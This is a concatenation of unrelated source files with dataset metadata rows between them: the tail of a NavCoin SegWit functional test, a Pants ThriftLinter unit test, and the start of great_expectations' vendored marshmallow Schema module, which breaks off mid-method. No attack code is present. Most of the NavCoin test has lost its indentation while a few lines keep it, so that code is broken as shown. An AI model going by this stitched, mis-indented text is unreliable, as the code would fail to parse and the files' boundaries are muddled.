elif (version == 1):
# 1-of-1 multisig
scripthash = bytes_to_hex_str(sha256(hex_str_to_bytes("5121" + pubkey + "51ae")))
pkscript = "0020" + scripthash
else:
assert("Wrong version" == "0 or 1")
return pkscript
def addlength(script):
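    # Prepends the script's byte length as a single hex byte, e.g. a 22-byte
    # witness program "0014<20-byte-hash>" (44 hex chars) becomes "160014<hash>".
    # The assert below only guarantees the length formats to exactly one byte
    # (16..255 bytes); longer push encodings are out of scope for this test.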
scriptlen = format(len(script)//2, 'x')
assert(len(scriptlen) == 2)
return scriptlen + script
def create_witnessprogram(version, node, utxo, pubkey, encode_p2sh, amount):
pkscript = witness_script(version, pubkey);
if (encode_p2sh):
p2sh_hash = bytes_to_hex_str(ripemd160(sha256(hex_str_to_bytes(pkscript))))
pkscript = "a914"+p2sh_hash+"87"
inputs = []
outputs = {}
inputs.append({ "txid" : utxo["txid"], "vout" : utxo["vout"]} )
DUMMY_P2SH = "2MySexEGVzZpRgNQ1JdjdP5bRETznm3roQ2" # P2SH of "OP_1 OP_DROP"
outputs[DUMMY_P2SH] = amount
tx_to_witness = node.createrawtransaction(inputs,outputs)
#replace dummy output with our own
tx_to_witness = tx_to_witness[0:110] + addlength(pkscript) + tx_to_witness[-8:]
return tx_to_witness
def send_to_witness(version, node, utxo, pubkey, encode_p2sh, amount, sign=True, insert_redeem_script=""):
tx_to_witness = create_witnessprogram(version, node, utxo, pubkey, encode_p2sh, amount)
if (sign):
signed = node.signrawtransaction(tx_to_witness)
assert("errors" not in signed or len(["errors"]) == 0)
return node.sendrawtransaction(signed["hex"])
else:
if (insert_redeem_script):
tx_to_witness = tx_to_witness[0:82] + addlength(insert_redeem_script) + tx_to_witness[84:]
return node.sendrawtransaction(tx_to_witness)
def getutxo(txid):
utxo = {}
utxo["vout"] = 0
utxo["txid"] = txid
return utxo
def find_unspent(node, min_value):
for utxo in node.listunspent():
if utxo['amount'] >= min_value:
return utxo
class SegWitTest(NavCoinTestFramework):
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain_clean(self.options.tmpdir, 3)
def setup_network(self):
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-logtimemicros", "-debug", "-walletprematurewitness"]))
self.nodes.append(start_node(1, self.options.tmpdir, ["-logtimemicros", "-debug", "-blockversion=4", "-promiscuousmempoolflags=517", "-prematurewitness", "-walletprematurewitness"]))
self.nodes.append(start_node(2, self.options.tmpdir, ["-logtimemicros", "-debug", "-blockversion=536870915", "-promiscuousmempoolflags=517", "-prematurewitness", "-walletprematurewitness"]))
connect_nodes(self.nodes[1], 0)
connect_nodes(self.nodes[2], 1)
connect_nodes(self.nodes[0], 2)
self.is_network_split = False
self.sync_all()
def success_mine(self, node, txid, sign, redeem_script=""):
send_to_witness(1, node, getutxo(txid), self.pubkey[0], False, Decimal("49.998"), sign, redeem_script)
block = node.generate(1)
assert_equal(len(node.getblock(block[0])["tx"]), 2)
sync_blocks(self.nodes)
def skip_mine(self, node, txid, sign, redeem_script=""):
send_to_witness(1, node, getutxo(txid), self.pubkey[0], False, Decimal("49.998"), sign, redeem_script)
block = node.generate(1)
assert_equal(len(node.getblock(block[0])["tx"]), 1)
sync_blocks(self.nodes)
def fail_accept(self, node, txid, sign, redeem_script=""):
try:
send_to_witness(1, node, getutxo(txid), self.pubkey[0], False, Decimal("49.998"), sign, redeem_script)
except JSONRPCException as exp:
assert(exp.error["code"] == -26)
else:
raise AssertionError("Tx should not have been accepted")
def fail_mine(self, node, txid, sign, redeem_script=""):
send_to_witness(1, node, getutxo(txid), self.pubkey[0], False, Decimal("49.998"), sign, redeem_script)
try:
node.generate(1)
except JSONRPCException as exp:
assert(exp.error["code"] == -1)
else:
raise AssertionError("Created valid block when TestBlockValidity should have failed")
sync_blocks(self.nodes)
def run_test(self):
self.nodes[0].generate(161) #block 161
print("Verify sigops are counted in GBT with pre-BIP141 rules before the fork")
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1)
tmpl = self.nodes[0].getblocktemplate({})
assert(tmpl['sigoplimit'] == 20000)
assert(tmpl['transactions'][0]['hash'] == txid)
assert(tmpl['transactions'][0]['sigops'] == 2)
tmpl = self.nodes[0].getblocktemplate({'rules':['segwit']})
assert(tmpl['sigoplimit'] == 20000)
assert(tmpl['transactions'][0]['hash'] == txid)
assert(tmpl['transactions'][0]['sigops'] == 2)
self.nodes[0].generate(1) #block 162
balance_presetup = self.nodes[0].getbalance()
self.pubkey = []
p2sh_ids = [] # p2sh_ids[NODE][VER] is an array of txids that spend to a witness version VER pkscript to an address for NODE embedded in p2sh
wit_ids = [] # wit_ids[NODE][VER] is an array of txids that spend to a witness version VER pkscript to an address for NODE via bare witness
for i in range(3):
newaddress = self.nodes[i].getnewaddress()
self.pubkey.append(self.nodes[i].validateaddress(newaddress)["pubkey"])
multiaddress = self.nodes[i].addmultisigaddress(1, [self.pubkey[-1]])
self.nodes[i].addwitnessaddress(newaddress)
self.nodes[i].addwitnessaddress(multiaddress)
p2sh_ids.append([])
wit_ids.append([])
for v in range(2):
p2sh_ids[i].append([])
wit_ids[i].append([])
for i in range(5):
for n in range(3):
for v in range(2):
wit_ids[n][v].append(send_to_witness(v, self.nodes[0], find_unspent(self.nodes[0], 50), self.pubkey[n], False, Decimal("49.999")))
p2sh_ids[n][v].append(send_to_witness(v, self.nodes[0], find_unspent(self.nodes[0], 50), self.pubkey[n], True, Decimal("49.999")))
self.nodes[0].generate(1) #block 163
sync_blocks(self.nodes)
# Make sure all nodes recognize the transactions as theirs
assert_equal(self.nodes[0].getbalance(), balance_presetup - 60*50 + 20*Decimal("49.999") + 50)
assert_equal(self.nodes[1].getbalance(), 20*Decimal("49.999"))
assert_equal(self.nodes[2].getbalance(), 20*Decimal("49.999"))
self.nodes[0].generate(260) #block 423
sync_blocks(self.nodes)
print("Verify default node can't accept any witness format txs before fork")
# unsigned, no scriptsig
self.fail_accept(self.nodes[0], wit_ids[NODE_0][WIT_V0][0], False)
self.fail_accept(self.nodes[0], wit_ids[NODE_0][WIT_V1][0], False)
self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V0][0], False)
self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V1][0], False)
# unsigned with redeem script
self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V0][0], False, addlength(witness_script(0, self.pubkey[0])))
self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V1][0], False, addlength(witness_script(1, self.pubkey[0])))
# signed
self.fail_accept(self.nodes[0], wit_ids[NODE_0][WIT_V0][0], True)
self.fail_accept(self.nodes[0], wit_ids[NODE_0][WIT_V1][0], True)
self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V0][0], True)
self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V1][0], True)
print("Verify witness txs are skipped for mining before the fork")
self.skip_mine(self.nodes[2], wit_ids[NODE_2][WIT_V0][0], True) #block 424
self.skip_mine(self.nodes[2], wit_ids[NODE_2][WIT_V1][0], True) #block 425
self.skip_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V0][0], True) #block 426
self.skip_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V1][0], True) #block 427
# TODO: An old node would see these txs without witnesses and be able to mine them
print("Verify unsigned bare witness txs in versionbits-setting blocks are valid before the fork")
self.success_mine(self.nodes[2], wit_ids[NODE_2][WIT_V0][1], False) #block 428
self.success_mine(self.nodes[2], wit_ids[NODE_2][WIT_V1][1], False) #block 429
print("Verify unsigned p2sh witness txs without a redeem script are invalid")
self.fail_accept(self.nodes[2], p2sh_ids[NODE_2][WIT_V0][1], False)
self.fail_accept(self.nodes[2], p2sh_ids[NODE_2][WIT_V1][1], False)
print("Verify unsigned p2sh witness txs with a redeem script in versionbits-settings blocks are valid before the fork")
self.success_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V0][1], False, addlength(witness_script(0, self.pubkey[2]))) #block 430
self.success_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V1][1], False, addlength(witness_script(1, self.pubkey[2]))) #block 431
print("Verify previous witness txs skipped for mining can now be mined")
assert_equal(len(self.nodes[2].getrawmempool()), 4)
block = self.nodes[2].generate(1) #block 432 (first block with new rules; 432 = 144 * 3)
sync_blocks(self.nodes)
assert_equal(len(self.nodes[2].getrawmempool()), 0)
assert_equal(len(self.nodes[2].getblock(block[0])["tx"]), 5)
print("Verify witness txs without witness data are invalid after the fork")
self.fail_mine(self.nodes[2], wit_ids[NODE_2][WIT_V0][2], False)
self.fail_mine(self.nodes[2], wit_ids[NODE_2][WIT_V1][2], False)
self.fail_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V0][2], False, addlength(witness_script(0, self.pubkey[2])))
self.fail_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V1][2], False, addlength(witness_script(1, self.pubkey[2])))
print("Verify default node can now use witness txs")
        self.success_mine(self.nodes[0], wit_ids[NODE_0][WIT_V0][0], True) #block 433
        self.success_mine(self.nodes[0], wit_ids[NODE_0][WIT_V1][0], True) #block 434
        self.success_mine(self.nodes[0], p2sh_ids[NODE_0][WIT_V0][0], True) #block 435
        self.success_mine(self.nodes[0], p2sh_ids[NODE_0][WIT_V1][0], True) #block 436
print("Verify sigops are counted in GBT with BIP141 rules after the fork")
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1)
tmpl = self.nodes[0].getblocktemplate({'rules':['segwit']})
assert(tmpl['sigoplimit'] == 80000)
assert(tmpl['transactions'][0]['txid'] == txid)
assert(tmpl['transactions'][0]['sigops'] == 8)
print("Verify non-segwit miners get a valid GBT response after the fork")
send_to_witness(1, self.nodes[0], find_unspent(self.nodes[0], 50), self.pubkey[0], False, Decimal("49.998"))
try:
tmpl = self.nodes[0].getblocktemplate({})
assert(len(tmpl['transactions']) == 1) # Doesn't include witness tx
assert(tmpl['sigoplimit'] == 20000)
assert(tmpl['transactions'][0]['hash'] == txid)
assert(tmpl['transactions'][0]['sigops'] == 2)
assert(('!segwit' in tmpl['rules']) or ('segwit' not in tmpl['rules']))
except JSONRPCException:
# This is an acceptable outcome
pass
if __name__ == '__main__':
SegWitTest().main()
| 49.330645 | 198 | 0.654569 |
f7bf2016a22d95a1318cbe4626967e602079f919 | 2,275 | py | Python | contrib/scrooge/tests/python/pants_test/contrib/scrooge/tasks/test_thrift_linter.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
] | null | null | null | contrib/scrooge/tests/python/pants_test/contrib/scrooge/tasks/test_thrift_linter.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
] | null | null | null | contrib/scrooge/tests/python/pants_test/contrib/scrooge/tasks/test_thrift_linter.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from mock import Mock, patch
from pants.backend.codegen.thrift.java.java_thrift_library import JavaThriftLibrary
from pants.base.workunit import WorkUnitLabel
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants_test.task_test_base import TaskTestBase
from pants.contrib.scrooge.tasks.thrift_linter import ThriftLinter
class ThriftLinterTest(TaskTestBase):
def _prepare_mocks(self, task):
self._run_java_mock = Mock(return_value=0)
task.tool_classpath = Mock(return_value='foo_classpath')
task.runjava = self._run_java_mock
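    # Both the classpath lookup and the JVM invocation are mocked out, so the
    # test below only asserts on the arguments ThriftLinter constructs, without
    # actually running scrooge-linter.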
@classmethod
def alias_groups(cls):
return BuildFileAliases(
targets={
'java_thrift_library': JavaThriftLibrary,
},
)
@classmethod
def task_type(cls):
return ThriftLinter
@patch('pants.contrib.scrooge.tasks.thrift_linter.calculate_compile_sources')
def test_lint(self, mock_calculate_compile_sources):
def get_default_jvm_options():
return self.task_type().get_jvm_options_default(self.context().options.for_global_scope())
thrift_target = self.create_library('a', 'java_thrift_library', 'a', ['A.thrift'])
task = self.create_task(self.context(target_roots=thrift_target))
self._prepare_mocks(task)
expected_include_paths = {'src/thrift/tweet', 'src/thrift/users'}
expected_paths = {'src/thrift/tweet/a.thrift', 'src/thrift/tweet/b.thrift'}
mock_calculate_compile_sources.return_value = (expected_include_paths, expected_paths)
task._lint(thrift_target, task.tool_classpath('scrooge-linter'))
self._run_java_mock.assert_called_once_with(
classpath='foo_classpath',
main='com.twitter.scrooge.linter.Main',
args=['--ignore-errors', '--include-path', 'src/thrift/users', '--include-path',
'src/thrift/tweet', 'src/thrift/tweet/b.thrift', 'src/thrift/tweet/a.thrift'],
jvm_options=get_default_jvm_options(),
workunit_labels=[WorkUnitLabel.COMPILER, WorkUnitLabel.SUPPRESS_LABEL])
| 40.625 | 96 | 0.755604 |
76cd2c1192f153710c0ad909540da9b7976e8770 | 49,711 | py | Python | great_expectations/marshmallow__shade/schema.py | victorcouste/great_expectations | 9ee46d83feb87e13c769e2ae35b899b3f18d73a4 | [
"Apache-2.0"
] | 6,451 | 2017-09-11T16:32:53.000Z | 2022-03-31T23:27:49.000Z | great_expectations/marshmallow__shade/schema.py | victorcouste/great_expectations | 9ee46d83feb87e13c769e2ae35b899b3f18d73a4 | [
"Apache-2.0"
] | 3,892 | 2017-09-08T18:57:50.000Z | 2022-03-31T23:15:20.000Z | great_expectations/marshmallow__shade/schema.py | victorcouste/great_expectations | 9ee46d83feb87e13c769e2ae35b899b3f18d73a4 | [
"Apache-2.0"
] | 1,023 | 2017-09-08T15:22:05.000Z | 2022-03-31T21:17:08.000Z | """The :class:`Schema` class, including its metaclass and options (class Meta)."""
import copy
import datetime as dt
import decimal
import inspect
import json
import typing
import uuid
import warnings
from collections import OrderedDict, defaultdict
from collections.abc import Mapping
from functools import lru_cache
from great_expectations.marshmallow__shade import base, class_registry
from great_expectations.marshmallow__shade import fields as ma_fields
from great_expectations.marshmallow__shade import types
from great_expectations.marshmallow__shade.decorators import (
POST_DUMP,
POST_LOAD,
PRE_DUMP,
PRE_LOAD,
VALIDATES,
VALIDATES_SCHEMA,
)
from great_expectations.marshmallow__shade.error_store import ErrorStore
from great_expectations.marshmallow__shade.exceptions import (
StringNotCollectionError,
ValidationError,
)
from great_expectations.marshmallow__shade.orderedset import OrderedSet
from great_expectations.marshmallow__shade.utils import (
EXCLUDE,
INCLUDE,
RAISE,
get_value,
is_collection,
is_instance_or_subclass,
is_iterable_but_not_string,
missing,
set_value,
)
from great_expectations.marshmallow__shade.warnings import RemovedInMarshmallow4Warning
_T = typing.TypeVar("_T")
def _get_fields(attrs, field_class, pop=False, ordered=False):
"""Get fields from a class. If ordered=True, fields will sorted by creation index.
:param attrs: Mapping of class attributes
:param type field_class: Base field class
:param bool pop: Remove matching fields
"""
fields = [
(field_name, field_value)
for field_name, field_value in attrs.items()
if is_instance_or_subclass(field_value, field_class)
]
if pop:
for field_name, _ in fields:
del attrs[field_name]
if ordered:
fields.sort(key=lambda pair: pair[1]._creation_index)
return fields
# This function allows Schemas to inherit from non-Schema classes and ensures
# inheritance according to the MRO
def _get_fields_by_mro(klass, field_class, ordered=False):
"""Collect fields from a class, following its method resolution order. The
class itself is excluded from the search; only its parents are checked. Get
fields from ``_declared_fields`` if available, else use ``__dict__``.
:param type klass: Class whose fields to retrieve
:param type field_class: Base field class
"""
mro = inspect.getmro(klass)
# Loop over mro in reverse to maintain correct order of fields
return sum(
(
_get_fields(
getattr(base, "_declared_fields", base.__dict__),
field_class,
ordered=ordered,
)
for base in mro[:0:-1]
),
[],
)
class SchemaMeta(type):
"""Metaclass for the Schema class. Binds the declared fields to
a ``_declared_fields`` attribute, which is a dictionary mapping attribute
names to field objects. Also sets the ``opts`` class attribute, which is
the Schema class's ``class Meta`` options.
"""
def __new__(mcs, name, bases, attrs):
meta = attrs.get("Meta")
ordered = getattr(meta, "ordered", False)
if not ordered:
# Inherit 'ordered' option
# Warning: We loop through bases instead of MRO because we don't
# yet have access to the class object
# (i.e. can't call super before we have fields)
for base_ in bases:
if hasattr(base_, "Meta") and hasattr(base_.Meta, "ordered"):
ordered = base_.Meta.ordered
break
else:
ordered = False
cls_fields = _get_fields(attrs, base.FieldABC, pop=True, ordered=ordered)
klass = super().__new__(mcs, name, bases, attrs)
inherited_fields = _get_fields_by_mro(klass, base.FieldABC, ordered=ordered)
meta = klass.Meta
# Set klass.opts in __new__ rather than __init__ so that it is accessible in
# get_declared_fields
klass.opts = klass.OPTIONS_CLASS(meta, ordered=ordered)
# Add fields specified in the `include` class Meta option
cls_fields += list(klass.opts.include.items())
dict_cls = OrderedDict if ordered else dict
# Assign _declared_fields on class
klass._declared_fields = mcs.get_declared_fields(
klass=klass,
cls_fields=cls_fields,
inherited_fields=inherited_fields,
dict_cls=dict_cls,
)
return klass
@classmethod
def get_declared_fields(
mcs,
klass: type,
cls_fields: typing.List,
inherited_fields: typing.List,
dict_cls: type,
):
"""Returns a dictionary of field_name => `Field` pairs declared on the class.
This is exposed mainly so that plugins can add additional fields, e.g. fields
computed from class Meta options.
:param klass: The class object.
:param cls_fields: The fields declared on the class, including those added
by the ``include`` class Meta option.
:param inherited_fields: Inherited fields.
        :param dict_cls: Either `dict` or `OrderedDict`, depending on whether
the user specified `ordered=True`.
"""
return dict_cls(inherited_fields + cls_fields)
def __init__(cls, name, bases, attrs):
super().__init__(name, bases, attrs)
if name and cls.opts.register:
class_registry.register(name, cls)
cls._hooks = cls.resolve_hooks()
def resolve_hooks(cls) -> typing.Dict[types.Tag, typing.List[str]]:
"""Add in the decorated processors
By doing this after constructing the class, we let standard inheritance
do all the hard work.
"""
mro = inspect.getmro(cls)
hooks = defaultdict(list) # type: typing.Dict[types.Tag, typing.List[str]]
for attr_name in dir(cls):
# Need to look up the actual descriptor, not whatever might be
# bound to the class. This needs to come from the __dict__ of the
# declaring class.
for parent in mro:
try:
attr = parent.__dict__[attr_name]
except KeyError:
continue
else:
break
else:
# In case we didn't find the attribute and didn't break above.
# We should never hit this - it's just here for completeness
# to exclude the possibility of attr being undefined.
continue
try:
hook_config = attr.__marshmallow_hook__
except AttributeError:
pass
else:
for key in hook_config.keys():
# Use name here so we can get the bound method later, in
# case the processor was a descriptor or something.
hooks[key].append(attr_name)
return hooks
class SchemaOpts:
"""class Meta options for the :class:`Schema`. Defines defaults."""
def __init__(self, meta, ordered: bool = False):
self.fields = getattr(meta, "fields", ())
if not isinstance(self.fields, (list, tuple)):
raise ValueError("`fields` option must be a list or tuple.")
self.additional = getattr(meta, "additional", ())
if not isinstance(self.additional, (list, tuple)):
raise ValueError("`additional` option must be a list or tuple.")
if self.fields and self.additional:
raise ValueError(
"Cannot set both `fields` and `additional` options"
" for the same Schema."
)
self.exclude = getattr(meta, "exclude", ())
if not isinstance(self.exclude, (list, tuple)):
raise ValueError("`exclude` must be a list or tuple.")
self.dateformat = getattr(meta, "dateformat", None)
self.datetimeformat = getattr(meta, "datetimeformat", None)
if hasattr(meta, "json_module"):
warnings.warn(
"The json_module class Meta option is deprecated. Use render_module instead.",
RemovedInMarshmallow4Warning,
)
render_module = getattr(meta, "json_module", json)
else:
render_module = json
self.render_module = getattr(meta, "render_module", render_module)
self.ordered = getattr(meta, "ordered", ordered)
self.index_errors = getattr(meta, "index_errors", True)
self.include = getattr(meta, "include", {})
self.load_only = getattr(meta, "load_only", ())
self.dump_only = getattr(meta, "dump_only", ())
self.unknown = getattr(meta, "unknown", RAISE)
self.register = getattr(meta, "register", True)
class Schema(base.SchemaABC, metaclass=SchemaMeta):
"""Base schema class with which to define custom schemas.
Example usage:
.. code-block:: python
import datetime as dt
from dataclasses import dataclass
from great_expectations.marshmallow__shade import Schema, fields
@dataclass
class Album:
title: str
release_date: dt.date
class AlbumSchema(Schema):
title = fields.Str()
release_date = fields.Date()
album = Album("Beggars Banquet", dt.date(1968, 12, 6))
schema = AlbumSchema()
data = schema.dump(album)
data # {'release_date': '1968-12-06', 'title': 'Beggars Banquet'}
:param only: Whitelist of the declared fields to select when
instantiating the Schema. If None, all fields are used. Nested fields
can be represented with dot delimiters.
:param exclude: Blacklist of the declared fields to exclude
when instantiating the Schema. If a field appears in both `only` and
`exclude`, it is not used. Nested fields can be represented with dot
delimiters.
:param many: Should be set to `True` if ``obj`` is a collection
so that the object will be serialized to a list.
:param context: Optional context passed to :class:`fields.Method` and
:class:`fields.Function` fields.
:param load_only: Fields to skip during serialization (write-only fields)
:param dump_only: Fields to skip during deserialization (read-only fields)
:param partial: Whether to ignore missing fields and not require
any fields declared. Propagates down to ``Nested`` fields as well. If
its value is an iterable, only missing fields listed in that iterable
will be ignored. Use dot delimiters to specify nested fields.
:param unknown: Whether to exclude, include, or raise an error for unknown
fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`.
.. versionchanged:: 3.0.0
`prefix` parameter removed.
.. versionchanged:: 2.0.0
`__validators__`, `__preprocessors__`, and `__data_handlers__` are removed in favor of
`marshmallow.decorators.validates_schema`,
`marshmallow.decorators.pre_load` and `marshmallow.decorators.post_dump`.
`__accessor__` and `__error_handler__` are deprecated. Implement the
`handle_error` and `get_attribute` methods instead.
"""
TYPE_MAPPING = {
str: ma_fields.String,
bytes: ma_fields.String,
dt.datetime: ma_fields.DateTime,
float: ma_fields.Float,
bool: ma_fields.Boolean,
tuple: ma_fields.Raw,
list: ma_fields.Raw,
set: ma_fields.Raw,
int: ma_fields.Integer,
uuid.UUID: ma_fields.UUID,
dt.time: ma_fields.Time,
dt.date: ma_fields.Date,
dt.timedelta: ma_fields.TimeDelta,
decimal.Decimal: ma_fields.Decimal,
} # type: typing.Dict[type, typing.Type[ma_fields.Field]]
#: Overrides for default schema-level error messages
error_messages = {} # type: typing.Dict[str, str]
_default_error_messages = {
"type": "Invalid input type.",
"unknown": "Unknown field.",
} # type: typing.Dict[str, str]
OPTIONS_CLASS = SchemaOpts # type: type
# These get set by SchemaMeta
opts = None # type: SchemaOpts
_declared_fields = {} # type: typing.Dict[str, ma_fields.Field]
_hooks = {} # type: typing.Dict[types.Tag, typing.List[str]]
class Meta:
"""Options object for a Schema.
Example usage: ::
class Meta:
fields = ("id", "email", "date_created")
exclude = ("password", "secret_attribute")
Available options:
- ``fields``: Tuple or list of fields to include in the serialized result.
- ``additional``: Tuple or list of fields to include *in addition* to the
explicitly declared fields. ``additional`` and ``fields`` are
mutually-exclusive options.
- ``include``: Dictionary of additional fields to include in the schema. It is
usually better to define fields as class variables, but you may need to
use this option, e.g., if your fields are Python keywords. May be an
`OrderedDict`.
- ``exclude``: Tuple or list of fields to exclude in the serialized result.
Nested fields can be represented with dot delimiters.
- ``dateformat``: Default format for `Date <fields.Date>` fields.
- ``datetimeformat``: Default format for `DateTime <fields.DateTime>` fields.
- ``render_module``: Module to use for `loads <Schema.loads>` and `dumps <Schema.dumps>`.
Defaults to `json` from the standard library.
- ``ordered``: If `True`, order serialization output according to the
order in which fields were declared. Output of `Schema.dump` will be a
`collections.OrderedDict`.
- ``index_errors``: If `True`, errors dictionaries will include the index
of invalid items in a collection.
- ``load_only``: Tuple or list of fields to exclude from serialized results.
- ``dump_only``: Tuple or list of fields to exclude from deserialization
- ``unknown``: Whether to exclude, include, or raise an error for unknown
fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`.
- ``register``: Whether to register the `Schema` with marshmallow's internal
class registry. Must be `True` if you intend to refer to this `Schema`
by class name in `Nested` fields. Only set this to `False` when memory
usage is critical. Defaults to `True`.
"""
def __init__(
self,
*,
only: types.StrSequenceOrSet = None,
exclude: types.StrSequenceOrSet = (),
many: bool = False,
context: typing.Dict = None,
load_only: types.StrSequenceOrSet = (),
dump_only: types.StrSequenceOrSet = (),
partial: typing.Union[bool, types.StrSequenceOrSet] = False,
unknown: str = None,
):
# Raise error if only or exclude is passed as string, not list of strings
if only is not None and not is_collection(only):
raise StringNotCollectionError('"only" should be a list of strings')
if not is_collection(exclude):
raise StringNotCollectionError('"exclude" should be a list of strings')
# copy declared fields from metaclass
self.declared_fields = copy.deepcopy(self._declared_fields)
self.many = many
self.only = only
self.exclude = set(self.opts.exclude) | set(exclude)
self.ordered = self.opts.ordered
self.load_only = set(load_only) or set(self.opts.load_only)
self.dump_only = set(dump_only) or set(self.opts.dump_only)
self.partial = partial
self.unknown = unknown or self.opts.unknown
self.context = context or {}
self._normalize_nested_options()
#: Dictionary mapping field_names -> :class:`Field` objects
self.fields = {} # type: typing.Dict[str, ma_fields.Field]
self.load_fields = {} # type: typing.Dict[str, ma_fields.Field]
self.dump_fields = {} # type: typing.Dict[str, ma_fields.Field]
self._init_fields()
messages = {}
messages.update(self._default_error_messages)
for cls in reversed(self.__class__.__mro__):
messages.update(getattr(cls, "error_messages", {}))
messages.update(self.error_messages or {})
self.error_messages = messages
def __repr__(self) -> str:
return "<{ClassName}(many={self.many})>".format(
ClassName=self.__class__.__name__, self=self
)
@property
def dict_class(self) -> type:
return OrderedDict if self.ordered else dict
@property
def set_class(self) -> type:
return OrderedSet if self.ordered else set
@classmethod
def from_dict(
cls,
fields: typing.Dict[str, typing.Union[ma_fields.Field, type]],
*,
name: str = "GeneratedSchema",
) -> type:
"""Generate a `Schema` class given a dictionary of fields.
.. code-block:: python
from great_expectations.marshmallow__shade import Schema, fields
PersonSchema = Schema.from_dict({"name": fields.Str()})
print(PersonSchema().load({"name": "David"})) # => {'name': 'David'}
Generated schemas are not added to the class registry and therefore cannot
be referred to by name in `Nested` fields.
:param dict fields: Dictionary mapping field names to field instances.
:param str name: Optional name for the class, which will appear in
the ``repr`` for the class.
.. versionadded:: 3.0.0
"""
attrs = fields.copy()
attrs["Meta"] = type(
"GeneratedMeta", (getattr(cls, "Meta", object),), {"register": False}
)
schema_cls = type(name, (cls,), attrs)
return schema_cls
##### Override-able methods #####
def handle_error(
self, error: ValidationError, data: typing.Any, *, many: bool, **kwargs
):
"""Custom error handler function for the schema.
:param error: The `ValidationError` raised during (de)serialization.
:param data: The original input data.
:param many: Value of ``many`` on dump or load.
:param partial: Value of ``partial`` on load.
.. versionadded:: 2.0.0
.. versionchanged:: 3.0.0rc9
Receives `many` and `partial` (on deserialization) as keyword arguments.
"""
pass
def get_attribute(self, obj: typing.Any, attr: str, default: typing.Any):
"""Defines how to pull values from an object to serialize.
.. versionadded:: 2.0.0
.. versionchanged:: 3.0.0a1
Changed position of ``obj`` and ``attr``.
"""
return get_value(obj, attr, default)
##### Serialization/Deserialization API #####
@staticmethod
def _call_and_store(getter_func, data, *, field_name, error_store, index=None):
"""Call ``getter_func`` with ``data`` as its argument, and store any `ValidationErrors`.
:param callable getter_func: Function for getting the serialized/deserialized
value from ``data``.
:param data: The data passed to ``getter_func``.
:param str field_name: Field name.
:param int index: Index of the item being validated, if validating a collection,
otherwise `None`.
"""
try:
value = getter_func(data)
except ValidationError as error:
error_store.store_error(error.messages, field_name, index=index)
# When a Nested field fails validation, the marshalled data is stored
# on the ValidationError's valid_data attribute
return error.valid_data or missing
return value
def _serialize(
self, obj: typing.Union[_T, typing.Iterable[_T]], *, many: bool = False
):
"""Serialize ``obj``.
:param obj: The object(s) to serialize.
:param bool many: `True` if ``data`` should be serialized as a collection.
:return: A dictionary of the serialized data
.. versionchanged:: 1.0.0
Renamed from ``marshal``.
"""
if many and obj is not None:
return [
self._serialize(d, many=False)
for d in typing.cast(typing.Iterable[_T], obj)
]
ret = self.dict_class()
for attr_name, field_obj in self.dump_fields.items():
value = field_obj.serialize(attr_name, obj, accessor=self.get_attribute)
if value is missing:
continue
key = field_obj.data_key if field_obj.data_key is not None else attr_name
ret[key] = value
return ret
def dump(self, obj: typing.Any, *, many: bool = None):
"""Serialize an object to native Python data types according to this
Schema's fields.
:param obj: The object to serialize.
:param many: Whether to serialize `obj` as a collection. If `None`, the value
for `self.many` is used.
:return: A dict of serialized data
:rtype: dict
.. versionadded:: 1.0.0
.. versionchanged:: 3.0.0b7
This method returns the serialized data rather than a ``(data, errors)`` duple.
A :exc:`ValidationError <marshmallow.exceptions.ValidationError>` is raised
if ``obj`` is invalid.
.. versionchanged:: 3.0.0rc9
Validation no longer occurs upon serialization.
"""
many = self.many if many is None else bool(many)
if many and is_iterable_but_not_string(obj):
obj = list(obj)
if self._has_processors(PRE_DUMP):
processed_obj = self._invoke_dump_processors(
PRE_DUMP, obj, many=many, original_data=obj
)
else:
processed_obj = obj
result = self._serialize(processed_obj, many=many)
if self._has_processors(POST_DUMP):
result = self._invoke_dump_processors(
POST_DUMP, result, many=many, original_data=obj
)
return result
def dumps(self, obj: typing.Any, *args, many: bool = None, **kwargs):
"""Same as :meth:`dump`, except return a JSON-encoded string.
:param obj: The object to serialize.
:param many: Whether to serialize `obj` as a collection. If `None`, the value
for `self.many` is used.
:return: A ``json`` string
:rtype: str
.. versionadded:: 1.0.0
.. versionchanged:: 3.0.0b7
This method returns the serialized data rather than a ``(data, errors)`` duple.
A :exc:`ValidationError <marshmallow.exceptions.ValidationError>` is raised
if ``obj`` is invalid.
"""
serialized = self.dump(obj, many=many)
def datetime_serializer(o):
if isinstance(o, dt.datetime):
return o.__str__()
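            # Objects that are neither JSON-serializable nor datetimes fall through
            # and implicitly return None, so they render as JSON null instead of
            # raising TypeError (behaviour that appears specific to this shaded copy).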
if "default" not in kwargs:
kwargs.update({"default": datetime_serializer})
return self.opts.render_module.dumps(serialized, *args, **kwargs)
def _deserialize(
self,
data: typing.Union[
typing.Mapping[str, typing.Any],
typing.Iterable[typing.Mapping[str, typing.Any]],
],
*,
error_store: ErrorStore,
many: bool = False,
partial=False,
